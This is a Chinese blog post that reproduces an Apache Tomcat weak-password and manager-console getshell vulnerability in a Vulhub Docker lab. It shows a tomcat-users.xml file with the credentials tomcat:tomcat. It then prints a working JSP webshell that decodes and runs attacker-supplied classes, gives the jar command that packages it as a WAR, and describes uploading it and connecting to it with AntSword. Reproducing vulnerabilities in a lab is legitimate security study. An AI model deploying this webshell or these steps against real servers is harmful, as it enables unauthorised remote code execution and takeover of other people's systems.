热门标签
热门文章
- 1链表的设计_首先定义一个节点类,包含数据域和指针域,然后定义链表类,链表中包含一个头节点,该
- 2迎七一党史知识竞赛答题怎么做
- 3Opencv测量图片中的物体大小_opencv测量物体尺寸
- 4opencv小工具-绘制resnet50热力图和灰度图-伪彩色映射_opencv 热力图
- 5LLM-大模型训练-步骤(二)-预训练/Pre-Training(1):全参数预训练(Full-Param Pre-Training)【对LLaMA等模型进一步全量参数预训练】【中文无监督学习语料】_大模型预训练方法
- 6你应该立即掌握的10个现代C++新特性
- 7sql查询 ,多行数据合并成一行,并且显示合并后某一列的值拼接结果_sql查询结果合并成一条数据
- 8NB-IoT应用开发笔记_nb-iot发送到天翼云
- 9基于STM32单片机的健康检测系统_基于stm32的人体健康状态检测系统
- 10AJAX 数据库
当前位置: article > 正文
【漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞_tomcat 弱口令
作者:黑客灵魂 | 2024-06-20 23:55:04
赞
踩
tomcat 弱口令
感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规
| 说明 | 内容 |
|---|---|
| 漏洞编号 | |
| 漏洞名称 | Tomcat7+ 弱口令 && 后台getshell漏洞 |
| 漏洞评级 | 高危 |
| 影响范围 | Tomcat 版本:8.0 |
| 漏洞描述 | Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限 tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击 |
| 修复方案 |
1.1、漏洞描述
Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限
Tomcat7+权限分为:
- manager(后台管理)
- manager-gui 拥有html页面权限
- manager-status 拥有查看status的权限
- manager-script 拥有text接口的权限,和status权限
- manager-jmx 拥有jmx权限,和status权限
- host-manager(虚拟主机管理)
- admin-gui 拥有html页面权限
- admin-script 拥有text接口权限
这些权限的究竟有什么作用,详情阅读 http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html
在conf/tomcat-users.xml文件中配置用户的权限:
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<role rolename="manager-jmx"/>
<role rolename="manager-status"/>
<role rolename="admin-gui"/>
<role rolename="admin-script"/>
<user username="tomcat" password="tomcat" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script" />
</tomcat-users>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
可见,用户tomcat拥有上述所有权限,密码是tomcat。
正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。
1.2、漏洞等级
高危
1.3、影响版本
Tomcat 版本:8.0
1.4、漏洞复现
1、基础环境
Path:Vulhub/tomcat/tomcat8
启动测试环境:
sudo docker-compose up -d
- 1
访问http://your-ip:8080/即可看到
点击Manager App即可跳到管理登陆页面
输入用户名密码 tomcat:tomcat,来到管理界面
2、漏洞扫描
3、漏洞验证
登录到后台后可以通过部署war包进行getshell
找一个a.jsp木马
<%! class U extends ClassLoader { U(ClassLoader c){ super(c); } public Class g(byte[] b){ return super.defineClass(b,0,b.length); } } public byte[] base64Decode(String str) throws Exception{ try{ Class clazz =Class.forName("sun.misc.BASE64Decoder"); return (byte[]) clazz.getMethod("decodeBuffer",String.class).invoke(clazz.newInstance(),str); }catch (Exception e){ Class clazz =Class.forName("java.util.Base64"); Object decoder =clazz.getMethod("getDecoder").invoke(null); return(byte[])decoder.getClass().getMethod("decode",String.class).invoke(decoder,str); } } %> <% String cls =request.getParameter("cmd"); if(cls != null){ new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); } %>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
打包成war包
jar cvf tomcat.war a.jsp
- 1
上传打包的tomcat.war
生成一个tomcat的路径
在地址栏路径中访问http://192.168.80.141:8080/tomcat/a.jsp
蚁剑连接,密码cmd
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/黑客灵魂/article/detail/741296
推荐阅读
相关标签
